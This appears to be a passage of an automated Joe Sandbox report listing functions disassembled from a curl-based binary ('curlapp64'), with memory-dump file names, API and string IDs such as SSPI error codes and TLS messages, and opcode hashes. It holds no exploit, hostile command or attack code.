                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
                                                                                                                                • API String ID: 3939687465-3852342135
                                                                                                                                • Opcode ID: 79225bff42c7f3756b2e0ba69c6c5bc578440328a4eb359beb1b3191571fa22f
                                                                                                                                • Instruction ID: f2b884fdabf01946b3ea531989e4af14048af757f955d199d9d66711060506be
                                                                                                                                • Opcode Fuzzy Hash: 79225bff42c7f3756b2e0ba69c6c5bc578440328a4eb359beb1b3191571fa22f
                                                                                                                                • Instruction Fuzzy Hash: A2015622A1EE82E1EA619F11A4402BE6371FF887D5F852031DA4E82794DF3CE545C710
                                                                                                                                Function 00007FF8A934E592 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_BAD_BINDINGS
                                                                                                                                • API String ID: 3939687465-4193802906
                                                                                                                                • Opcode ID: 4ae39aaba354ca312d6457255954bcf7a71cb4e06a228ebbb92d9d27a1cbc1c8
                                                                                                                                • Instruction ID: 32caf5c80613d64898dbf583f8092828f2b21953cb9a4411b9d5b267865e5aa7
                                                                                                                                • Opcode Fuzzy Hash: 4ae39aaba354ca312d6457255954bcf7a71cb4e06a228ebbb92d9d27a1cbc1c8
                                                                                                                                • Instruction Fuzzy Hash: AD015622A1EEC2E1EA619F11A4402BE6371FF887D5F852031DA4E82790DF3CE545C714
                                                                                                                                Function 00007FF8A934E59B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_BAD_PKGID
                                                                                                                                • API String ID: 3939687465-428854770
                                                                                                                                • Opcode ID: e4821e884ca1c9353c5073079b8e784af184d8bf8c5e6d8cf8b8576c186c9ca4
                                                                                                                                • Instruction ID: 26191b410a7879a18588054c94f9bfde26e2e3901169cacdd4aa31eac5c21784
                                                                                                                                • Opcode Fuzzy Hash: e4821e884ca1c9353c5073079b8e784af184d8bf8c5e6d8cf8b8576c186c9ca4
                                                                                                                                • Instruction Fuzzy Hash: 2E015222A1EE82A1EA629F11A4402BE6371FF88BD5F852031DA4E82790EF3CE545C710
                                                                                                                                Function 00007FF8A934E5A4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_BUFFER_TOO_SMALL
                                                                                                                                • API String ID: 3939687465-3213503683
                                                                                                                                • Opcode ID: f0a99ce0059c141c48ec04eda93cf9f360708583881361bae81ebbd9556a3f0d
                                                                                                                                • Instruction ID: 82019d095515d89cfabbc85da5b404eb89777c49127725e256ad2a0e7fae8d19
                                                                                                                                • Opcode Fuzzy Hash: f0a99ce0059c141c48ec04eda93cf9f360708583881361bae81ebbd9556a3f0d
                                                                                                                                • Instruction Fuzzy Hash: 2E015222A1EE82A1EA629F11A4402BE6371FF88BD5F852035DA4E82790EF3CE545C710
                                                                                                                                Function 00007FF8A934E5AD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_INSTALL
                                                                                                                                • API String ID: 3939687465-3689135316
                                                                                                                                • Opcode ID: 50d27433e9ce647bc4f9590cf387356ba4aeaa3a2d0b820b697123033eebe261
                                                                                                                                • Instruction ID: 0f69ce22d2a8762d596b646e4239e8a86ce60fa6fc118df82c16fa7250f8ecef
                                                                                                                                • Opcode Fuzzy Hash: 50d27433e9ce647bc4f9590cf387356ba4aeaa3a2d0b820b697123033eebe261
                                                                                                                                • Instruction Fuzzy Hash: 81015622A1EE82E1EA619F11A4402BE6371FF887D5F852031DA4E82794DF3CE545C710
                                                                                                                                Function 00007FF8A934E5B6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_PACK
                                                                                                                                • API String ID: 3939687465-1144097955
                                                                                                                                • Opcode ID: b67d73a2223d1d1db4298fc8e6e3aa8c67cbe50cf565ce810dca4f246a39bc46
                                                                                                                                • Instruction ID: a8f9c172a368224548a319a683fb6d08fdf42fe500b7cce0092bc7fbffbb4f4b
                                                                                                                                • Opcode Fuzzy Hash: b67d73a2223d1d1db4298fc8e6e3aa8c67cbe50cf565ce810dca4f246a39bc46
                                                                                                                                • Instruction Fuzzy Hash: 42015222A1EE82A1EA629F11A4402BE6371FF88BD5F852031DA4E82790EF3CE545C710
                                                                                                                                Function 00007FF8A934E548 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                • String ID: %s (0x%08X) - %s$SEC_E_ALGORITHM_MISMATCH
                                                                                                                                • API String ID: 3939687465-3091687665
                                                                                                                                • Opcode ID: 25c386bd488f808c3cfea18c7eaafe3f10b4d0589020745c7e9fd4b935c226b7
                                                                                                                                • Instruction ID: d9231d774635ff2239b23ef00364597414d3094eb294b1e77a61041222a57287
                                                                                                                                • Opcode Fuzzy Hash: 25c386bd488f808c3cfea18c7eaafe3f10b4d0589020745c7e9fd4b935c226b7
                                                                                                                                • Instruction Fuzzy Hash: EA017536A1EE82A1EA629F11E4402BE6371FF88BD5F852031DA4E82790DF3CE545C710
                                                                                                                                Function 00007FF8A935FDD0 Relevance: 9.1, APIs: 6, Instructions: 66encryptionCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$CertCloseStore
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 899430957-0
                                                                                                                                • Opcode ID: 6e14b1c510b87c549e5761cb06657a077f6e268d51c93029928815c3de9d7ec8
                                                                                                                                • Instruction ID: 15121bd24ece2dd9d79f3c6051ec3d03a4025234d05a195d4968888df7113fd5
                                                                                                                                • Opcode Fuzzy Hash: 6e14b1c510b87c549e5761cb06657a077f6e268d51c93029928815c3de9d7ec8
                                                                                                                                • Instruction Fuzzy Hash: 7831F83660AF919AEB548F25E99013D33B4FF48FD4B586125CA4E83B19CF38E491C744
                                                                                                                                Function 00007FF8A930C530 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 232COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                                                                                                                                • API String ID: 0-551583306
                                                                                                                                • Opcode ID: 1ce9f70385006cc101ffba8d375b1d85ed6e8ef4980041faddd4d11942582997
                                                                                                                                • Instruction ID: 258a8c5ae8a49ce9b608ca4400140aa9506d3b634b7eeebbb233ffb1cc0df599
                                                                                                                                • Opcode Fuzzy Hash: 1ce9f70385006cc101ffba8d375b1d85ed6e8ef4980041faddd4d11942582997
                                                                                                                                • Instruction Fuzzy Hash: D8A1A966A0EBC6A6FB248F6694443797BB0EB45BC4F0860B1DE4D87795EF2CE844C344
                                                                                                                                Function 00007FF8A93562C0 Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: callocfree
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 306872129-0
                                                                                                                                • Opcode ID: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                                                                                • Instruction ID: 2b1a5660df4f81fbd2bbcf1d175dc659b2a0333436f4fd129caab5d5eb214797
                                                                                                                                • Opcode Fuzzy Hash: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                                                                                • Instruction Fuzzy Hash: 4871497260ABC185E3518F34E8483DA37A4E745BBCF181339DAB94E6DADFB99044C721
                                                                                                                                Function 00007FF8A93064A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastrecv
                                                                                                                                • String ID: Recv failure: %s$recv(len=%zu) -> %d, err=%d
                                                                                                                                • API String ID: 2514157807-2495832097
                                                                                                                                • Opcode ID: bed5f14da304bbb2045fd42038e80d1795d9aec1cf0dcfeb36a033d7ec83f45d
                                                                                                                                • Instruction ID: c4843fff18739d03c23980199dfddcb5140bf558a8e4566250e876ebf213abee
                                                                                                                                • Opcode Fuzzy Hash: bed5f14da304bbb2045fd42038e80d1795d9aec1cf0dcfeb36a033d7ec83f45d
                                                                                                                                • Instruction Fuzzy Hash: 2031C572A0DAC1AAEA219F16A8443AAB7A0FB487D4F106135DF9D87795DF3CE041C700
                                                                                                                                Function 00007FF8A934F5B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59stringwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FormatMessagestrchrwcstombs
                                                                                                                                • String ID: Unknown error
                                                                                                                                • API String ID: 4171340688-83687255
                                                                                                                                • Opcode ID: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                                                                                • Instruction ID: 6d326fa48263f68ca10a0684bbc56957c585831adc06bb687cc73e0c56413df3
                                                                                                                                • Opcode Fuzzy Hash: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                                                                                • Instruction Fuzzy Hash: F121B022A0DFC195FB218F24A80436EAAA0EFC97D1F495230CA9D877E5DF3C94018710
                                                                                                                                Function 00007FF8A9314840 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FF8A935C700: GetModuleHandleA.KERNEL32 ref: 00007FF8A935C746
                                                                                                                                  • Part of subcall function 00007FF8A935C700: GetProcAddress.KERNEL32 ref: 00007FF8A935C756
                                                                                                                                  • Part of subcall function 00007FF8A934FC30: GetModuleHandleW.KERNEL32 ref: 00007FF8A934FC44
                                                                                                                                • GetProcAddressForCaller.KERNELBASE ref: 00007FF8A93148A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc$Caller
                                                                                                                                • String ID: InitSecurityInterfaceW$secur32.dll$security.dll
                                                                                                                                • API String ID: 2824060896-1950755585
                                                                                                                                • Opcode ID: 7c02c1c736985d97e36572f55ab4815c32138ce75a420f4355de45eaa3645f69
                                                                                                                                • Instruction ID: 7f52b11323c61d5a7cbcd5d7b7d7ecdd011ea8fb6297bfccab780eb717a47614
                                                                                                                                • Opcode Fuzzy Hash: 7c02c1c736985d97e36572f55ab4815c32138ce75a420f4355de45eaa3645f69
                                                                                                                                • Instruction Fuzzy Hash: 2501ED21B1EF8262EE449F19A89576567F0FF443C4F886039DA4EC2765EE3CD4158600
                                                                                                                                Function 00007FF6CABF6F4C Relevance: 6.2, APIs: 4, Instructions: 229COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF6CABF6F37,?), ref: 00007FF6CABF706A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4145635619-0
                                                                                                                                • Opcode ID: 94d95521b1b01706eecbab5fac4e3e82ca01bb292129b5491e49817cb00286ab
                                                                                                                                • Instruction ID: d3df410ee9372d463929fdcd69ea7aa5550107a96a8ca17b9020175959331f5b
                                                                                                                                • Opcode Fuzzy Hash: 94d95521b1b01706eecbab5fac4e3e82ca01bb292129b5491e49817cb00286ab
                                                                                                                                • Instruction Fuzzy Hash: 3E91F93EE1865245FB50CFA5BC606BD27A0BB46B49F0841BADE8ED7B85DE38D085C700
                                                                                                                                Function 00007FF8A9361420 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                                                                                                                • API String ID: 0-3791222319
                                                                                                                                • Opcode ID: 76035a393a8ad4ac1fd9104368ceed61eda902bbd573967bdf73d03ce450db05
                                                                                                                                • Instruction ID: c536d9ce97041247c4f44818f227eafa504713ae36327c89b36351f05099be24
                                                                                                                                • Opcode Fuzzy Hash: 76035a393a8ad4ac1fd9104368ceed61eda902bbd573967bdf73d03ce450db05
                                                                                                                                • Instruction Fuzzy Hash: 9D41A621A0EAC2A5EA10CE65558027FE7B1EF45BE4F102230DF5A877D5EF7DE4018700
                                                                                                                                Function 00007FF6CABE3D7C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
